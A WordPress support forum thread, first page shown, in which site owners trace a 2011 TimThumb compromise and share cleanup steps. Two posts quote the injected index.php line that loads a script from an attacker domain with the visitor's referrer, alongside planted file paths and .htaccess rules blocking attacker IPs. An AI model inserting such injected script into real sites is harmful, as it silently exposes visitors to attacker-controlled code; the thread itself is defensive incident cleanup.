Title: Two Strange Errors
Last modified: August 20, 2016

---

# Two Strange Errors

 *  Resolved [cfisher](https://wordpress.org/support/users/cfisher/)
 * (@cfisher)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/)
 * Hello,
 * I am using Version 1.9.1 of your plugin.
 * Things have worked great for a long time but recently things have gone haywire.
 * I have two problems that I cannot seem to figure out.
 * 1. I am now forced to log into my WordPress admin via https. If log-in via http,
   I am redirected to the log in each and every time.
 * 2. For some reason, I started to get browser warnings that my https is not loading
   secure along with a broken https in the browers URL line. The culprit turned 
   out to be [http://superpuperdomain.com/count.php](http://superpuperdomain.com/count.php)
   which apparently is WordPress core code (index.php). So I enabled, as suggested
   in this forum, External HTTPS Elements and Bypass External Check. That fixed 
   the security errors. However, now in Internet Explorer 9, I get this warning,“
   Internet Explorer block this website from displaying content with security certificate
   errors.” The interesting thing is this appears on non-https pages – even before
   I reach a https page. This is a new error, and I am confident my security certificate
   is fine.
 * Any suggestions?
 * Thanks!
    Chris

Viewing 15 replies - 1 through 15 (of 34 total)

1 [2](https://wordpress.org/support/topic/two-strange-errors/page/2/?output_format=md)
[3](https://wordpress.org/support/topic/two-strange-errors/page/3/?output_format=md)
[→](https://wordpress.org/support/topic/two-strange-errors/page/2/?output_format=md)

 *  [bballad](https://wordpress.org/support/users/bballad/)
 * (@bballad)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230692)
 * You have been hacked, your theme is the culprit
 * [http://wordpress.org/support/topic/rss-feed-crash?replies=6](http://wordpress.org/support/topic/rss-feed-crash?replies=6)
 *  Thread Starter [cfisher](https://wordpress.org/support/users/cfisher/)
 * (@cfisher)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230701)
 * Dang. I think you are right. I checked my index.php against a freshly downloaded
   WordPress 3.2.1 and indeed it is not part of the core WordPress Code.
 * In fact, I found the exact code identified in the link you sent:
 *     ```
       /** Loads the WordPress Environment and Template */
       require('./wp-blog-header.php');
       echo'<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>'; ?>
       ```
   
 * Now I need to figure out how to fix this.
 * Thanks for your help.
 * Chris
 *  [OceansDB](https://wordpress.org/support/users/oceansdb/)
 * (@oceansdb)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230714)
 * Going to quote my post for y’all
 * Hello,
 * I have/had a similar problem, not with my rss though.
 * You should read the following about superpuperdomain.com
 * What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated
   by hackers gaining write access to your WordPress directory. I myself did not
   take an image of it, but was dumb enough to fall for it. What it did was it would
   show an HTTP authentication-like alert upon launching the WordPress administration
   directory and entering your username and password would show a message linking
   to a page in another language.
 * Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.
 * I learned that this hack was caused by a security vulnerability in timthumb.php(
   a thumbnail fetching script) and I was susceptible because I did not update my
   timthumb.php.
 * I scoured the Internet and finally found a fix.
 * First, in your WordPress’s index.php, remove the following script added by the
   hack:
 * echo ‘<script type=”text/javascript” language=”javascript” src=”[http://superpuperdomain.com/count.php?ref=&#8217](http://superpuperdomain.com/count.php?ref=&#8217);.
   urlencode($_SERVER[‘HTTP_REFERER’]) .'”></script>’;
 * Then remove three phony files added by the hackers (back up first, in case your
   installation actually requires these files):
 * /wp-admin/js/config.php
    /wp-admin/common.php /wp-content/udp.php
 * Do not try to open any of these files, as my antivirus sounded alarms immediately.
 * I learned my lesson, and upon purging TechSpheria of this hack, I changed about
   twenty passwords.
 * To increase your site’s security, make sure you have correct permissions for 
   files and directories.
 * Folder permissions for all of my WordPress installations are 755 whereas file
   permissions are 644.
 * Run this bash command to set the correct permissions recursively for your WordPress
   installation:
 * chmod -R 0755 /wordpressdirectory
 * I also added this rule in my .htaccess (in my account’s root folder, not inside
   public_html):
 * order allow,deny
    deny from 91.220 allow from all
 * The malicious script was run from superpuperdomain.com and I had run a traceroute
   on that domain, and found its servers’ IP addresses. To be safe, I blocked all
   the IPs in their range (91.220) and they would receive a forbidden notice if 
   they tried to access TechSpheria again.
 * Source: Techspheria
 * [http://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/](http://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/)
 * Maybe it is a smart idea to check your WordPress installation for the files, 
   ban the IP and update your timthumb.php…. Just in case 😉
 * I guess we have to keep monitoring the website TechSperia, because yesterday 
   they said there were two phony files, today there are three.
 * Kind regards, OceansDB
 *  Plugin Author [mvied](https://wordpress.org/support/users/mvied/)
 * (@mvied)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230735)
 * Sorry to hear you got hacked. Once the dust settles, let me know if you’re having
   any issue with my plugin.
 * Also, not that I’ve tried any of them, but do you have any security plugins installed?
   I don’t really have any recommendations as I’ve never used them. I run my own
   server and tend to keep it on lockdown. I haven’t had any issues yet, other than
   some clever spam bots on one of my Buddypress sites.
 *  [OceansDB](https://wordpress.org/support/users/oceansdb/)
 * (@oceansdb)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230764)
 * It is not your plugin. Timthumb.php has a security leak. The TS (topic starter)
   has to update his timthumb script.
 *  Plugin Author [mvied](https://wordpress.org/support/users/mvied/)
 * (@mvied)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230770)
 * Yes, I know. I can read. Lol.
 *  Thread Starter [cfisher](https://wordpress.org/support/users/cfisher/)
 * (@cfisher)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230792)
 * Thanks everyone for the posts. I was indeed hacked because of the timthumb. It
   was used in my theme (elegant themes); The guys at BlogOnCloud9 are wonderful
   and responsive and already cleaned my website today. Everything is running fine
   again.
 * However, Mvied, I can not figure this one out. I am forced to log-in https on
   my website. If I log-in http, the log-in fails, and it re-directs to this link:
   [http://www.bmedpress.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.bmedpress.com%2Fwp-admin%2F](http://www.bmedpress.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.bmedpress.com%2Fwp-admin%2F)
 * Any suggestions?
 * Chris
 *  Plugin Author [mvied](https://wordpress.org/support/users/mvied/)
 * (@mvied)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230794)
 * Hey cfisher,
 * I just released version 1.9.2 which has a fix for that issue. I actually ninja’d
   the fix into 1.9.1, but if you downloaded it before that, the bug would still
   occur. Update and let me know if that fixes it for you.
 * Thanks,
    Mike
 *  Thread Starter [cfisher](https://wordpress.org/support/users/cfisher/)
 * (@cfisher)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230806)
 * Hi Mvied,
 * That fixed it! Thanks for the prompt response and fix. Thanks to the community
   for their input too.
 * All items have been resolved in this thread now.
 * Thanks!
    Chris
 *  Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/)
 * (@ipstenu)
 * 🏳️‍🌈 Advisor and Activist
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230858)
 * For those following along, this seems to be the TimThumb issue: [http://blog.sucuri.net/2011/08/wordpress-sites-hacked-with-superpuperdomain-com-attacking-timthumb-php.html](http://blog.sucuri.net/2011/08/wordpress-sites-hacked-with-superpuperdomain-com-attacking-timthumb-php.html)
 *  [RoarinRow](https://wordpress.org/support/users/roarinrow/)
 * (@roarinrow)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230859)
 * Thanks for the fix and the suggestions! I found all the files in question.
 *  [OceansDB](https://wordpress.org/support/users/oceansdb/)
 * (@oceansdb)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230865)
 * Okay, going to copy paste a few details here. The site you are giving Ipstenu
   is great, but doesn’t inform about the phony files superpuperdomain places in
   your wordpress installation.
 * **Please do not forget to delete these files!**
 *     ```
       /wp-admin/js/config.php
       /wp-admin/common.php
       /wp-admin/udp.php
       /wp-content/udp.php
       /wp-content/uploads/feed-file.php
       /wp-content/uploads/feed-files.php
       ```
   
 * **Don’t forget to make a .htaccess file outside your public_html with these lines:**
 *     ```
       order allow,deny
       deny from 91.220
       deny from 91.196
       deny from superpuperdomain.com
       deny from superpuperdomain2.com
       allow from all
       ```
   
 * Thank you 🙂
 *  [lfaria](https://wordpress.org/support/users/lfaria/)
 * (@lfaria)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230870)
 * Apart from these files, also found:
 * / wp-content/e334….php
    / wp-config.php / index.php
 * Who had injected code.
 * Lauro Faria
    [http://www.bdibbs.com.br](http://www.bdibbs.com.br)
 *  [wolfsteritory](https://wordpress.org/support/users/wolfsteritory/)
 * (@wolfsteritory)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230873)
 * ok. so how do we make this update to TimThumb ?
 * i deleted those files last week , all was fine, but now it seems i can see any
   pictures in my websites , that are with external content
 * in ftp i see that timthumb.php was modified yesterday !
 *  [lfaria](https://wordpress.org/support/users/lfaria/)
 * (@lfaria)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230874)
 * Check the version of Timthumb.php.
    Here, it was version 2.4, but adulterated.
   The latest version is 2.7, but compare the official version. [http://timthumb.googlecode.com/svn/trunk/timthumb.php](http://timthumb.googlecode.com/svn/trunk/timthumb.php)
   Stay tuned.

Viewing 15 replies - 1 through 15 (of 34 total)

1 [2](https://wordpress.org/support/topic/two-strange-errors/page/2/?output_format=md)
[3](https://wordpress.org/support/topic/two-strange-errors/page/3/?output_format=md)
[→](https://wordpress.org/support/topic/two-strange-errors/page/2/?output_format=md)

The topic ‘Two Strange Errors’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/wordpress-https_bec2c9.svg)
 * [WordPress HTTPS (SSL)](https://wordpress.org/plugins/wordpress-https/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/wordpress-https/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/wordpress-https/)
 * [Active Topics](https://wordpress.org/support/plugin/wordpress-https/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wordpress-https/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wordpress-https/reviews/)

 * 34 replies
 * 14 participants
 * Last reply from: [Mike](https://wordpress.org/support/users/wordpresskeepercom/)
 * Last activity: [14 years, 1 month ago](https://wordpress.org/support/topic/two-strange-errors/page/3/#post-2230996)
 * Status: resolved